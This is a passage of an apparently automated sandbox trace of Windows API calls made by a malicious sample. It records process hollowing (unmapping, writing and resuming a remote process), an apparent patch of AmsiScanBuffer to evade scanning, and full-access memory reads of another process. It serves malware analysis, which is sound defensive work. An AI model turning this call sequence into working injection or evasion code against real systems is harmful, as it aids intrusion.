lpNumberOfBytesRead=0x19e358 | out: lpBuffer=0x19e30c*, lpNumberOfBytesRead=0x19e358*=0x4) returned 1 [0168.027] NtUnmapViewOfSection (ProcessHandle=0x2e8, BaseAddress=0x400000) returned 0x0 [0168.029] VirtualAllocEx (hProcess=0x2e8, lpAddress=0x400000, dwSize=0x1d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0168.031] WriteProcessMemory (in: hProcess=0x2e8, lpBaseAddress=0x400000, lpBuffer=0x330a6a0*, nSize=0x400, lpNumberOfBytesWritten=0x19e358 | out: lpBuffer=0x330a6a0*, lpNumberOfBytesWritten=0x19e358*=0x400) returned 1 [0168.046] WriteProcessMemory (in: hProcess=0x2e8, lpBaseAddress=0x401000, lpBuffer=0x229dbd4*, nSize=0x11600, lpNumberOfBytesWritten=0x19e358 | out: lpBuffer=0x229dbd4*, lpNumberOfBytesWritten=0x19e358*=0x11600) returned 1 [0168.182] WriteProcessMemory (in: hProcess=0x2e8, lpBaseAddress=0x413000, lpBuffer=0x22af1e0*, nSize=0x3e00, lpNumberOfBytesWritten=0x19e358 | out: lpBuffer=0x22af1e0*, lpNumberOfBytesWritten=0x19e358*=0x3e00) returned 1 [0168.249] WriteProcessMemory (in: hProcess=0x2e8, lpBaseAddress=0x417000, lpBuffer=0x22b2fec*, nSize=0x200, lpNumberOfBytesWritten=0x19e358 | out: lpBuffer=0x22b2fec*, lpNumberOfBytesWritten=0x19e358*=0x200) returned 1 [0168.267] WriteProcessMemory (in: hProcess=0x2e8, lpBaseAddress=0x419000, lpBuffer=0x22b31f8*, nSize=0x1a00, lpNumberOfBytesWritten=0x19e358 | out: lpBuffer=0x22b31f8*, lpNumberOfBytesWritten=0x19e358*=0x1a00) returned 1 [0168.281] WriteProcessMemory (in: hProcess=0x2e8, lpBaseAddress=0x41b000, lpBuffer=0x22b4c04*, nSize=0x1e00, lpNumberOfBytesWritten=0x19e358 | out: lpBuffer=0x22b4c04*, lpNumberOfBytesWritten=0x19e358*=0x1e00) returned 1 [0168.300] WriteProcessMemory (in: hProcess=0x2e8, lpBaseAddress=0x2c1008, lpBuffer=0x22b6a10*, nSize=0x4, lpNumberOfBytesWritten=0x19e358 | out: lpBuffer=0x22b6a10*, lpNumberOfBytesWritten=0x19e358*=0x4) returned 1 [0168.307] SetThreadContext (hThread=0x2e4, lpContext=0x229d8fc*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x2c1000, Edx=0x0, Ecx=0x0, Eax=0x4057f0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0168.308] ResumeThread (hThread=0x2e4) returned 0x1 [0170.742] GetKernelObjectSecurity (in: Handle=0x2e4, RequestedInformation=0x4, pSecurityDescriptor=0x22b6a2c, nLength=0x0, lpnLengthNeeded=0x19e220 | out: pSecurityDescriptor=0x22b6a2c, lpnLengthNeeded=0x19e220) returned 0 [0170.742] GetKernelObjectSecurity (in: Handle=0x2e4, RequestedInformation=0x4, pSecurityDescriptor=0x22b6a38, nLength=0x64, lpnLengthNeeded=0x19e220 | out: pSecurityDescriptor=0x22b6a38, lpnLengthNeeded=0x19e220) returned 1 [0170.874] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x22b6ce4, cbSid=0x19e21c | out: pSid=0x22b6ce4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x19e21c) returned 1 [0170.895] SetKernelObjectSecurity (Handle=0x2e4, SecurityInformation=0x4, SecurityDescriptor=0x22b6db0) returned 1 [0170.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="amsi.dll", cchWideChar=8, lpMultiByteStr=0x19e18c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="amsi.dllÛ\x06|\x04ùa¥", lpUsedDefaultChar=0x0) returned 8 [0170.967] LoadLibraryA (lpLibFileName="amsi.dll") returned 0x6d300000 [0170.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AmsiScanBuffer", cchWideChar=14, lpMultiByteStr=0x19e178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AmsiScanBufferd", lpUsedDefaultChar=0x0) returned 14 [0170.976] GetProcAddress (hModule=0x6d300000, lpProcName="AmsiScanBuffer") returned 0x6d304020 [0170.980] VirtualProtect (in: lpAddress=0x6d304020, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19e210 | out: lpflOldProtect=0x19e210*=0x20) returned 1 [0170.981] VirtualProtect (in: lpAddress=0x6d304020, dwSize=0x8, flNewProtect=0x20, lpflOldProtect=0x19e20c | out: lpflOldProtect=0x19e20c*=0x40) returned 1 [0171.133] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x148) returned 0x2f0 [0171.141] GetSystemInfo (in: lpSystemInfo=0x19dddc | out: lpSystemInfo=0x19dddc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0171.151] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x10000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.155] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x11000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.155] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x12000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.155] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x13000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.156] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x14000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.156] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x15000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.156] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x16000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.156] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x17000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.157] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x18000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.157] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x19000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.157] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x1a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.157] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x1b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.157] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x1c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.158] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x1d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.158] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x1e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.158] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x1f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.158] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x20000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.158] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x21000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.159] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x22000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.160] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x23000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.160] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x24000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.160] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x25000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.160] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x26000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.160] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x27000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.161] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x28000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.161] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x29000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.161] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x2a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.162] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x2b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.162] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x2c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.162] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x2d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.162] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x2e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.163] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x2f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.163] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x30000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.163] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x31000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.164] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x32000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.164] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x33000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.164] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x34000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.165] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x35000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.165] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x36000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.165] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x37000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.165] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x38000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.165] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x39000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.166] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x3a000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.166] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x3b000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.166] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x3c000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.166] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x3d000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.166] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x3e000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.167] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x3f000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.167] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x40000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.167] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x41000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.167] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x42000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.168] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x43000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.168] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x44000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.168] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x45000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.168] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x46000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, lpNumberOfBytesRead=0x19de08*=0x1000) returned 1 [0171.169] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x47000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400*, 